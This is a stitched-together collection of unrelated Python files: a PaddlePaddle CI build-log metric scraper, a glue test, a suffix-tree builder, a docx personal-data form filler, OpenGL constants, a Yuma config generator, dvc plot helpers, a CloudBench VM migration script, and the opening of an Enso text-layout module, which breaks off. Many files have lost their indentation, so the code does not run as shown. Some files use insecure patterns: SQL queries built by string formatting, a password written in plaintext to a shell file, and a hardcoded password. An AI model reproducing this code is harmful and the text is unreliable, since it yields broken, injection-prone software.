#coding=utf-8
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from utils.readConfig import ReadConfig
from utils.auth_ipipe import Get_ipipe_auth
from utils.db import Database
from utils import bosclient
import os
import time
import datetime
import logging
from tornado.httpclient import AsyncHTTPClient
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
localConfig = ReadConfig()
logging.basicConfig(
level=logging.INFO,
filename='./logs/event.log',
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
def ifDocumentFix(message):
    return 'test=document_fix' in message
def ifAlreadyExist(query_stat):
    """Return the epoch seconds of the newest matching record, or '' if none exists."""
    db = Database()
    result = list(db.query(query_stat))
    queryTime = ''
    if len(result) != 0:
        # The stored timestamp looks like '2021-07-01T03:04:05.123456'; strip the
        # fractional seconds, add 8 hours, and convert the result to epoch seconds.
        queryTime = result[0][0]['time'].split('.')[0].replace('T', ' ')
        queryTime = time.strptime(queryTime, '%Y-%m-%d %H:%M:%S')
        dt = datetime.datetime.fromtimestamp(time.mktime(queryTime))
        actualQueryTime = (
            dt + datetime.timedelta(hours=8)).strftime("%Y-%m-%d %H:%M:%S")
        timeArray = time.strptime(actualQueryTime, "%Y-%m-%d %H:%M:%S")
        queryTime = int(time.mktime(timeArray))
    return queryTime
def generateCiIndex(repo, sha, target_url):
if target_url.startswith('http://10.87.145.41:8111'):
analyze_teamcity_log(target_url)
elif target_url.startswith('https://xly.bce.baidu.com'):
analyze_ipipe_log(sha, target_url)
def analyze_teamcity_log(target_url):
pass
def analyze_ipipe_log(sha, target_url):
index_dict = {}
pipelineBuildid = target_url.split('/')[-3]
stage_url = localConfig.cf.get('ipipeConf', 'stage_url') + pipelineBuildid
session, req = Get_ipipe_auth(stage_url)
try:
res = session.send(req).json()
except Exception as e:
print("Error: %s" % e)
else:
pipelineConfName = res['pipelineConfName']
jobGroupBuildBeans = res['pipelineBuildBean']['stageBuildBeans'][0][
'jobGroupBuildBeans'][0]
PR = res['pipelineBuildBean']['stageBuildBeans'][0]['outParams'][
'AGILE_PULL_ID']
createTime = get_commit_createTime(PR, sha)
index_dict['PR'] = int(PR)
index_dict['commitId'] = sha
index_dict['createTime'] = createTime
for job in jobGroupBuildBeans:
jobName = job['jobName']
if jobName not in ['构建镜像', 'build-docker-image']:
logParam = job['realJobBuild']['logUrl']
startTime = int(str(job['startTime'])[:-3])
endTime = int(str(job['endTime'])[:-3])
index_dict['startTime'] = startTime
index_dict['endTime'] = endTime
logUrl = localConfig.cf.get('ipipeConf', 'log_url') + logParam
getIpipeBuildLog(index_dict, sha, pipelineConfName, logUrl)
def getIpipeBuildLog(index_dict, sha, pipelineConfName, logUrl):
try:
r = requests.get(logUrl)
except Exception as e:
print("Error: %s" % e)
else:
with open("buildLog/%s_%s.log" % (pipelineConfName, sha), "wb") as f:
f.write(r.content)
f.close()
get_index(index_dict, sha, pipelineConfName)
os.remove("buildLog/%s_%s.log" % (pipelineConfName, sha))
def get_index(index_dict, sha, pipelineConfName):
ifInsert = True
db = Database()
filename = '%s_%s.log' % (pipelineConfName, sha)
index_dict['ciName'] = pipelineConfName
    with open('buildLog/%s' % filename, 'r') as f:
        data = f.read()
    logger.info('filename: %s; PR: %s' % (filename, index_dict['PR']))
buildTime_strlist = data.split('Build Time:', 1)
buildTime = buildTime_strlist[1:][0].split('s')[0].strip()
index_dict['buildTime'] = float(buildTime)
if filename.startswith('PR-CI-Inference'):
fluidInferenceSize_strlist = data.split('FLuid_Inference Size:', 1)
fluidInferenceSize = fluidInferenceSize_strlist[1:][0].split('M')[
0].strip()
index_dict['fluidInferenceSize'] = float(fluidInferenceSize)
testFluidLibTime_strlist = data.split('test_fluid_lib Total Time:', 1)
testFluidLibTime = testFluidLibTime_strlist[1:][0].split('s')[0].strip(
)
index_dict['testFluidLibTime'] = float(testFluidLibTime)
testFluidLibTrainTime_strlist = data.split(
'test_fluid_lib_train Total Time:', 1)
testFluidLibTrainTime = testFluidLibTrainTime_strlist[1:][0].split(
's')[0].strip()
index_dict['testFluidLibTrainTime'] = float(testFluidLibTrainTime)
elif filename.startswith('PR-CI-Coverage') or filename.startswith(
'PR-CI-Py35'):
buildSize_strlist = data.split('Build Size:', 1)
buildSize = buildSize_strlist[1:][0].split('G')[0].strip()
index_dict['buildSize'] = float(buildSize)
WhlSize_strlist = data.split('PR whl Size:', 1)
WhlSize = WhlSize_strlist[1:][0].split('M')[0].strip()
index_dict['WhlSize'] = float(WhlSize)
testCaseCount_single_strlist = data.split('1 card TestCases count is')
testCaseCount_single = 0
        for item in testCaseCount_single_strlist[1:]:  # single-card cases are reported in two parts
            testCaseCount_single += int(item.split('\n')[0].strip())
index_dict['testCaseCount_single'] = testCaseCount_single
testCaseCount_multi_strlist = data.split('2 card TestCases count is')
testCaseCount_multi = int(testCaseCount_multi_strlist[1:][0].split(
'\n')[0].strip())
index_dict['testCaseCount_multi'] = testCaseCount_multi
testCaseCount_exclusive_strlist = data.split(
'exclusive TestCases count is')
testCaseCount_exclusive = int(testCaseCount_exclusive_strlist[1:][0]
.split('\n')[0].strip())
index_dict['testCaseCount_exclusive'] = testCaseCount_exclusive
testCaseCount_total = testCaseCount_single + testCaseCount_multi + testCaseCount_exclusive
index_dict['testCaseCount_total'] = testCaseCount_total
testCaseTime_single_strlist = data.split(
'1 card TestCases Total Time:')
testCaseTime_single = 0
        for item in testCaseTime_single_strlist[1:]:  # single-card cases are reported in two parts
            testCaseTime_single += int(item.split('s')[0].strip())
index_dict['testCaseTime_single'] = testCaseTime_single
testCaseTime_multi_strlist = data.split('2 card TestCases Total Time:')
testCaseTime_multi = int(testCaseTime_multi_strlist[1:][0].split('s')[
0].strip())
index_dict['testCaseTime_multi'] = testCaseTime_multi
testCaseTime_exclusive_strlist = data.split(
'exclusive TestCases Total Time:')
testCaseTime_exclusive = int(testCaseTime_exclusive_strlist[1:][0]
.split('s')[0].strip())
index_dict['testCaseTime_exclusive'] = testCaseTime_exclusive
testCaseTime_total_strlist = data.split('TestCases Total Time:')
testCaseTime_total = 0
for item in testCaseTime_total_strlist[1:]:
testCaseTime_total = int(item.split('s')[0].strip()) if int(
item.split('s')[0].strip(
)) > testCaseTime_total else testCaseTime_total
index_dict['testCaseTime_total'] = testCaseTime_total
insertTime = int(time.time())
query_stat = "SELECT * FROM paddle_ci_index WHERE ciName='%s' and commitId='%s' and PR=%s order by time desc" % (
index_dict['ciName'], index_dict['commitId'], index_dict['PR'])
queryTime = ifAlreadyExist(query_stat)
    if queryTime != '':
        # Skip the insert if an identical record was written less than 30 seconds ago.
        ifInsert = insertTime - queryTime >= 30
if ifInsert == True:
result = db.insert('paddle_ci_index', index_dict)
if result == True:
logger.info('%s %s %s insert paddle_ci_index success!' %
(pipelineConfName, index_dict['PR'], sha))
else:
logger.info('%s %s %s insert paddle_ci_index failed!' %
(pipelineConfName, index_dict['PR'], sha))
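# For reference, get_index() pulls its metrics out of marker lines in the raw CI
# build log. Based on the split() markers above, the log is expected to contain
# lines like the following (the numeric values here are placeholders):
#   Build Time: 1234.5s
#   Build Size: 12.3G
#   PR whl Size: 98.7M
#   1 card TestCases count is 200        (appears twice, hence the summing loop)
#   2 card TestCases count is 50
#   exclusive TestCases count is 10
#   1 card TestCases Total Time: 300s
#   TestCases Total Time: 900s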
def get_commit_createTime(PR, sha):
"""get commit createtime"""
query_stat = "SELECT createTime FROM commit_create_time WHERE PR=%s and commitId='%s'" % (
PR, sha)
db = Database()
result = list(db.query(query_stat))
if len(result) != 0:
createTime = result[0][0]['createTime']
else:
logger.error("The commit created before 2020-07-03 17:10: %s, %s" %
(PR, sha))
createTime = 0
return createTime
|
import pytest
import numpy as np
from numpy.testing import assert_equal
from glue.core import Data, DataCollection
from glue.core.link_helpers import LinkSame
ARRAY = np.arange(3024).reshape((6, 7, 8, 9)).astype(float)
class TestFixedResolutionBuffer():
def setup_method(self, method):
self.data_collection = DataCollection()
# The reference dataset. Shape is (6, 7, 8, 9).
self.data1 = Data(x=ARRAY)
self.data_collection.append(self.data1)
# A dataset with the same shape but not linked. Shape is (6, 7, 8, 9).
self.data2 = Data(x=ARRAY)
self.data_collection.append(self.data2)
# A dataset with the same number of dimensions but in a different
# order, linked to the first. Shape is (9, 7, 6, 8).
self.data3 = Data(x=np.moveaxis(ARRAY, (3, 1, 0, 2), (0, 1, 2, 3)))
self.data_collection.append(self.data3)
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[0],
self.data3.pixel_component_ids[2]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[1],
self.data3.pixel_component_ids[1]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[2],
self.data3.pixel_component_ids[3]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[3],
self.data3.pixel_component_ids[0]))
# A dataset with fewer dimensions, linked to the first one. Shape is
# (8, 7, 6)
self.data4 = Data(x=ARRAY[:, :, :, 0].transpose())
self.data_collection.append(self.data4)
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[0],
self.data4.pixel_component_ids[2]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[1],
self.data4.pixel_component_ids[1]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[2],
self.data4.pixel_component_ids[0]))
# A dataset with even fewer dimensions, linked to the first one. Shape
# is (8, 6)
self.data5 = Data(x=ARRAY[:, 0, :, 0].transpose())
self.data_collection.append(self.data5)
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[0],
self.data5.pixel_component_ids[1]))
self.data_collection.add_link(LinkSame(self.data1.pixel_component_ids[2],
self.data5.pixel_component_ids[0]))
# A dataset that is not on the same pixel grid and requires reprojection
# self.data6 = Data()
# self.data6.coords = SimpleCoordinates()
# self.array_nonaligned = np.arange(60).reshape((5, 3, 4))
# self.data6['x'] = np.array(self.array_nonaligned)
# self.data_collection.append(self.data6)
# self.data_collection.add_link(LinkSame(self.data1.world_component_ids[0],
# self.data6.world_component_ids[1]))
# self.data_collection.add_link(LinkSame(self.data1.world_component_ids[1],
# self.data6.world_component_ids[2]))
# self.data_collection.add_link(LinkSame(self.data1.world_component_ids[2],
# self.data6.world_component_ids[0]))
# Start off with the cases where the data is the target data. Enumerate
# the different cases for the bounds and the expected result.
DATA_IS_TARGET_CASES = [
# Bounds are full extent of data
([(0, 5, 6), (0, 6, 7), (0, 7, 8), (0, 8, 9)],
ARRAY),
# Bounds are inside data
([(2, 3, 2), (3, 3, 1), (0, 7, 8), (0, 7, 8)],
ARRAY[2:4, 3:4, :, :8]),
# Bounds are outside data along some dimensions
([(-5, 9, 15), (3, 5, 3), (0, 9, 10), (5, 6, 2)],
np.pad(ARRAY[:, 3:6, :, 5:7], [(5, 4), (0, 0), (0, 2), (0, 0)],
mode='constant', constant_values=-np.inf)),
# No overlap
([(2, 3, 2), (3, 3, 1), (-5, -4, 2), (0, 7, 8)],
-np.inf * np.ones((2, 1, 2, 8)))
]
@pytest.mark.parametrize(('bounds', 'expected'), DATA_IS_TARGET_CASES)
def test_data_is_target_full_bounds(self, bounds, expected):
buffer = self.data1.compute_fixed_resolution_buffer(target_data=self.data1, bounds=bounds,
target_cid=self.data1.id['x'])
assert_equal(buffer, expected)
buffer = self.data3.compute_fixed_resolution_buffer(target_data=self.data1, bounds=bounds,
target_cid=self.data3.id['x'])
assert_equal(buffer, expected)
|
# -*- coding: utf-8 -*-
from east.asts import ast
from east.asts import utils
from east import consts
class NaiveAnnotatedSuffixTree(ast.AnnotatedSuffixTree):
__algorithm__ = consts.ASTAlgorithm.AST_NAIVE
def _construct(self, strings_collection):
"""
Naive generalized suffix tree construction algorithm,
with quadratic [O(n_1^2 + ... + n_m^2)] worst-case time complexity,
where m is the number of strings in collection.
"""
# 0. Add a unique character to each string in the collection,
# to preserve simplicity while building the tree
strings_collection = utils.make_unique_endings(strings_collection)
root = ast.AnnotatedSuffixTree.Node()
root.strings_collection = strings_collection
# For each string in the collection...
for string_ind in xrange(len(strings_collection)):
string = strings_collection[string_ind]
# For each suffix of that string...
# (do not handle unique last characters as suffixes)
for suffix_start in xrange(len(string)-1):
suffix = string[suffix_start:]
# ... first try to find maximal matching path
node = root
child_node = node.chose_arc(suffix)
while child_node:
(str_ind, substr_start, substr_end) = child_node.arc()
match = utils.match_strings(
suffix, strings_collection[str_ind][substr_start:substr_end])
if match == substr_end-substr_start:
# matched the arc, proceed with child node
suffix = suffix[match:]
suffix_start += match
node = child_node
node.weight += 1
child_node = node.chose_arc(suffix)
else:
# ... then, where the matching path ends;
# create new inner node
# (that's the only possible alternative
# since we have unique string endings)
node.remove_child(child_node)
new_node = node.add_new_child(string_ind, suffix_start,
suffix_start+match)
new_leaf = new_node.add_new_child(string_ind, suffix_start+match,
len(string))
(osi, oss, ose) = child_node._arc
child_node._arc = (osi, oss+match, ose)
new_node.add_child(child_node)
new_leaf.weight = 1
new_node.weight = 1 + child_node.weight
suffix = ''
break
# ... or create new leaf if there was no appropriate arc to proceed
if suffix:
new_leaf = node.add_new_child(string_ind, suffix_start, len(string))
new_leaf.weight = 1
# Root will also be annotated by the weight of its children,
# to preserve simplicity while calculating string matching
for k in root.children:
root.weight += root.children[k].weight
return root
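# Illustrative note (not part of the original module): for an input string "abab",
# make_unique_endings() appends a unique terminator -- say "abab$" -- and the loop
# above then inserts each proper suffix ("abab$", "bab$", "ab$", "b$"), re-walking
# the tree from the root every time; that repeated walk is what gives the quadratic
# worst-case bound stated in the docstring.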
|
from docxtpl import DocxTemplate
from constants import monthes
class Saver:
# TODO
"""
Смотри, мне кажется, что когда пользователь указывает нам фотографию,
мы будем копировать её, куда-то в скрытую папке и в б/д хранить путь в секретке
---
GUI -> Saver -> DB
path path
to
row processed
photo photo
"""
pass
def generic_document(user):
doc = DocxTemplate('static/template.docx')
sl = {
'name': user.name,
'surname': user.surname,
'father_name': user.father_name,
'date_of_give': user.profile.date_of_give,
'place_of_pasport': user.profile.place_of_pasport,
'day': date.today().day,
'month': monthes[date.today().month - 1],
'seria': user.profile.seria,
'nomer': user.profile.nomer
}
doc.render(sl)
doc.save('Перс_данные.docx')
if __name__ == '__main__':
from models import *
from datetime import date
user = User(
name='Bulat',
surname='Zaripov',
father_name='Ruslanovi4',
email='[email protected]',
sex='M',
password='LALALALA',
profile=Profile.create()
)
user.profile.seria = '8016'
user.profile.nomer = '234234'
user.profile.date_of_give = date(2016, 12, 3)
user.profile.place_of_pasport = 'Mrakovo'
user.save()
generic_document(user)
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_KHR_texture_compression_astc_ldr'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_KHR_texture_compression_astc_ldr',error_checker=_errors._error_checker)
GL_COMPRESSED_RGBA_ASTC_10x10_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x10_KHR',0x93BB)
GL_COMPRESSED_RGBA_ASTC_10x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x5_KHR',0x93B8)
GL_COMPRESSED_RGBA_ASTC_10x6_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x6_KHR',0x93B9)
GL_COMPRESSED_RGBA_ASTC_10x8_KHR=_C('GL_COMPRESSED_RGBA_ASTC_10x8_KHR',0x93BA)
GL_COMPRESSED_RGBA_ASTC_12x10_KHR=_C('GL_COMPRESSED_RGBA_ASTC_12x10_KHR',0x93BC)
GL_COMPRESSED_RGBA_ASTC_12x12_KHR=_C('GL_COMPRESSED_RGBA_ASTC_12x12_KHR',0x93BD)
GL_COMPRESSED_RGBA_ASTC_4x4_KHR=_C('GL_COMPRESSED_RGBA_ASTC_4x4_KHR',0x93B0)
GL_COMPRESSED_RGBA_ASTC_5x4_KHR=_C('GL_COMPRESSED_RGBA_ASTC_5x4_KHR',0x93B1)
GL_COMPRESSED_RGBA_ASTC_5x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_5x5_KHR',0x93B2)
GL_COMPRESSED_RGBA_ASTC_6x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_6x5_KHR',0x93B3)
GL_COMPRESSED_RGBA_ASTC_6x6_KHR=_C('GL_COMPRESSED_RGBA_ASTC_6x6_KHR',0x93B4)
GL_COMPRESSED_RGBA_ASTC_8x5_KHR=_C('GL_COMPRESSED_RGBA_ASTC_8x5_KHR',0x93B5)
GL_COMPRESSED_RGBA_ASTC_8x6_KHR=_C('GL_COMPRESSED_RGBA_ASTC_8x6_KHR',0x93B6)
GL_COMPRESSED_RGBA_ASTC_8x8_KHR=_C('GL_COMPRESSED_RGBA_ASTC_8x8_KHR',0x93B7)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x10_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x10_KHR',0x93DB)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x5_KHR',0x93D8)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x6_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x6_KHR',0x93D9)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x8_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_10x8_KHR',0x93DA)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x10_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x10_KHR',0x93DC)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_12x12_KHR',0x93DD)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_4x4_KHR',0x93D0)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x4_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x4_KHR',0x93D1)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_5x5_KHR',0x93D2)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x5_KHR',0x93D3)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x6_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_6x6_KHR',0x93D4)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x5_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x5_KHR',0x93D5)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x6_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x6_KHR',0x93D6)
GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x8_KHR=_C('GL_COMPRESSED_SRGB8_ALPHA8_ASTC_8x8_KHR',0x93D7)
|
#!/usr/bin/env python
import sys
import os
# ----------------------------------------------------------------------------|
if __name__ == '__main__':
print """Generating Configuration Script for remote Yuma Testing...\n"""
ipAddr = raw_input( "Enter Netconf Agent Ip address: ")
port = raw_input( "Enter Netconf Agent Source Port: ")
user = raw_input( "Enter Netconf User Name: ")
passWd = raw_input( "Enter Netconf User's Password: ")
outFilename = "./config.sh"
out=open( outFilename, 'w' )
out.write( "export YUMA_AGENT_IPADDR="+ipAddr+"\n" )
out.write( "export YUMA_AGENT_PORT="+port+"\n" )
out.write( "export YUMA_AGENT_USER="+user+"\n" )
out.write( "export YUMA_AGENT_PASSWORD="+passWd+"\n" )
print ( "Environment configuration written to %s" % outFilename )
print ( "Source %s with the comman '. %s' to configure the test environment"
% ( outFilename, outFilename ) )
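    # For reference, the generated config.sh ends up looking like this (the values
    # are whatever was typed at the prompts above; these ones are made up):
    #   export YUMA_AGENT_IPADDR=192.168.0.10
    #   export YUMA_AGENT_PORT=830
    #   export YUMA_AGENT_USER=admin
    #   export YUMA_AGENT_PASSWORD=secret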
|
import os.path
from typing import Dict, List
import dpath.util
def get_files(plots_data: Dict) -> List:
values = dpath.util.values(plots_data, ["*", "*"])
return sorted({key for submap in values for key in submap.keys()})
def group_by_filename(plots_data: Dict) -> List[Dict]:
files = get_files(plots_data)
grouped = []
for file in files:
grouped.append(dpath.util.search(plots_data, ["*", "*", file]))
return grouped
def squash_plots_properties(data: Dict) -> Dict:
resolved: Dict[str, str] = {}
for rev_data in data.values():
for file_data in rev_data.get("data", {}).values():
props = file_data.get("props", {})
resolved = {**resolved, **props}
return resolved
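# Toy illustration (the layout is an assumption inferred from the helpers above,
# not taken from dvc documentation): plots_data maps
# revision -> "data" -> filename -> {"props": {...}}, e.g.
#   plots_data = {
#       "workspace": {"data": {"plot.csv": {"props": {"x": "step"}}}},
#       "HEAD":      {"data": {"plot.csv": {"props": {"y": "loss"}}}},
#   }
# group_by_filename(plots_data) then yields one group per file -- here a single
# group holding both revisions' "plot.csv" entries -- and squash_plots_properties()
# on that group merges the props into {"x": "step", "y": "loss"}.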
def match_renderers(plots_data, templates):
from dvc.render import RENDERERS
renderers = []
for group in group_by_filename(plots_data):
plot_properties = squash_plots_properties(group)
template = templates.load(plot_properties.get("template", None))
for renderer_class in RENDERERS:
if renderer_class.matches(group):
renderers.append(
renderer_class(
group, template=template, properties=plot_properties
)
)
return renderers
def render(
repo,
renderers,
metrics=None,
path=None,
html_template_path=None,
refresh_seconds=None,
):
if not html_template_path:
html_template_path = repo.config.get("plots", {}).get(
"html_template", None
)
if html_template_path and not os.path.isabs(html_template_path):
html_template_path = os.path.join(repo.dvc_dir, html_template_path)
from dvc.render.html import write
return write(
path,
renderers,
metrics=metrics,
template_path=html_template_path,
refresh_seconds=refresh_seconds,
)
|
#!/usr/bin/env python
#/*******************************************************************************
# Copyright (c) 2012 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#/*******************************************************************************
#--------------------------------- START CB API --------------------------------
from sys import path, argv
from time import sleep
import fnmatch
import os
import pwd
home = os.environ["HOME"]
username = pwd.getpwuid(os.getuid())[0]
api_file_name = "/tmp/cb_api_" + username
if os.access(api_file_name, os.F_OK) :
try :
_fd = open(api_file_name, 'r')
_api_conn_info = _fd.read()
_fd.close()
except :
_msg = "Unable to open file containing API connection information "
_msg += "(" + api_file_name + ")."
print _msg
exit(4)
else :
_msg = "Unable to locate file containing API connection information "
_msg += "(" + api_file_name + ")."
print _msg
exit(4)
_path_set = False
for _path, _dirs, _files in os.walk(os.path.abspath(path[0] + "/../")):
for _filename in fnmatch.filter(_files, "code_instrumentation.py") :
if _path.count("/lib/auxiliary") :
path.append(_path.replace("/lib/auxiliary",''))
_path_set = True
break
if _path_set :
break
from lib.api.api_service_client import *
_msg = "Connecting to API daemon (" + _api_conn_info + ")..."
print _msg
api = APIClient(_api_conn_info)
#---------------------------------- END CB API ---------------------------------
expid = "ft_" + makeTimestamp().replace(" ", "_")
if len(argv) != 5 :
print "./" + argv[0] + " [cloud_name] [type] [role] [migrate|protect]"
exit(1)
needed_cloud_name = argv[1]
needed_type = argv[2]
needed_role = argv[3]
action = argv[4]
print "Going to resume VM role " + needed_role + " from first saved App of type " + needed_type + "..."
try :
error = False
app = None
api.cldalter(needed_cloud_name, "time", "experiment_id", "not_ready_yet")
apps = api.applist(needed_cloud_name, "all")
if len(apps) == 0 :
print "No saved Apps available. Make some."
exit(1)
found = None
for app in apps :
if app["type"] == needed_type :
found = app
name = None
for vm in app["vms"].split(",") :
uuid, role, temp_name = vm.split("|")
if role == needed_role :
name = temp_name
vm = api.vmshow(needed_cloud_name, uuid)
break
if name is None:
app = None
print needed_role + " vm not found."
exit(1)
break
if not found :
app = None
print needed_type + " application not found."
exit(1)
api.cldalter(needed_cloud_name, "time", "experiment_id", expid)
print "Found App " + app["name"] + ". Generating scripts..."
file1 = "/home/mrhines/ftvm/vmstatus.sh"
file2 = "/home/mrhines/ftvm/qemudebug.sh"
file3 = "/home/mrhines/ftvm/pingvm.sh"
file4 = "/home/mrhines/ftvm/consolevm.sh"
file5 = "/home/mrhines/ftvm/loginvm.sh"
f = open(file1, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("sudo virsh qemu-monitor-command " + vm["cloud_vm_name"] + " --hmp --cmd \"info status\"\n")
f.write("sudo virsh qemu-monitor-command " + vm["cloud_vm_name"] + " --hmp --cmd \"info migrate\"\n")
f.close()
os.chmod(file1, 0755)
f = open(file2, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("gdb /home/mrhines/qemu/x86_64-softmmu/qemu-system-x86_64 --pid $(pgrep -f " + vm["cloud_vm_name"] + ") -ex \"handle SIGUSR2 noprint\" -ex \"\" -ex \"continue\"\n")
f.close()
os.chmod(file2, 0755)
f = open(file3, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("ping " + vm["cloud_ip"] + "\n")
f.close()
os.chmod(file3, 0755)
f = open(file4, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("sudo virsh console " + vm["cloud_uuid"] + "\n")
f.close()
os.chmod(file4, 0755)
f = open(file5, 'w+')
f.write("#!/usr/bin/env bash\n")
f.write("ssh klabuser@" + vm["cloud_ip"] + "\n")
f.close()
os.chmod(file5, 0755)
appdetails = api.appshow(needed_cloud_name, app['uuid'])
if appdetails["state"] == "save" :
print "App " + app["name"] + " " + app["uuid"] + " is saved, restoring ..."
api.apprestore(needed_cloud_name, app["uuid"])
secs=10
print "Wait " + str(secs) + " seconds before migrating..."
sleep(secs)
hosts = api.hostlist(needed_cloud_name)
found = False
print "searching for 1st available host to " + action + " to..."
for host in hosts :
if host["cloud_hostname"] != vm["host_name"] :
print "Migrating VM " + name + " to " + host["cloud_hostname"] + "..."
if action == "migrate" :
api.vmmigrate(needed_cloud_name, vm["uuid"], host["name"], vm["migrate_protocol"])
else :
api.vmprotect(needed_cloud_name, vm["uuid"], host["name"], vm["protect_protocol"])
found = True
print "Migrate complete"
if not found :
print "available host not found =("
print "Waiting for CTRL-C..."
while True :
sleep(10)
except APIException, obj :
error = True
print "API Problem (" + str(obj.status) + "): " + obj.msg
except KeyboardInterrupt :
print "Aborting this APP."
except Exception, msg :
error = True
print "Problem during experiment: " + str(msg)
finally :
if app is not None :
try :
print "Destroying application..."
api.appdetach(needed_cloud_name, app["uuid"], True)
except APIException, obj :
print "Error finishing up: (" + str(obj.status) + "): " + obj.msg
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.graphics.xmltextlayout
#
# ----------------------------------------------------------------------------
"""
Module for XML text layout.
This module implements a high-level XML-based interface to the
textlayout module. It also provides a simple style mechanism that
is heavily based on the Cascading Style Sheets (CSS) system.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
import logging
import re
import xml.sax
import xml.sax.handler
from collections import namedtuple
from xml.sax.expatreader import SAXParseException
from enso.graphics import font, measurement, textlayout
from enso.utils.memoize import memoized
# Install lxml for speedup
LXML_AVAILABLE = True
try:
from lxml import etree
except Exception as e:
logging.warn("Error importing lxml: %s", e)
logging.warn("Install python-lxml for speed boost")
LXML_AVAILABLE = False
RGBA = namedtuple('RGBA', 'red green blue alpha')
# ----------------------------------------------------------------------------
# Constants
# ----------------------------------------------------------------------------
# Ordinarily, we'd use the unicodedata module for this, but it's a
# hefty file so we'll just define values here.
NON_BREAKING_SPACE = u"\u00a0"
RE_REDUCESPACE = re.compile(r"\s+")
# ----------------------------------------------------------------------------
# Utility functions
# ----------------------------------------------------------------------------
@memoized
def colorHashToRgba(colorHash):
"""
Converts the given HTML-style color hash (e.g., '#aabbcc') or
HTML-with-alpha color hash (e.g. '#aabbccdd') to a quad-color (r,
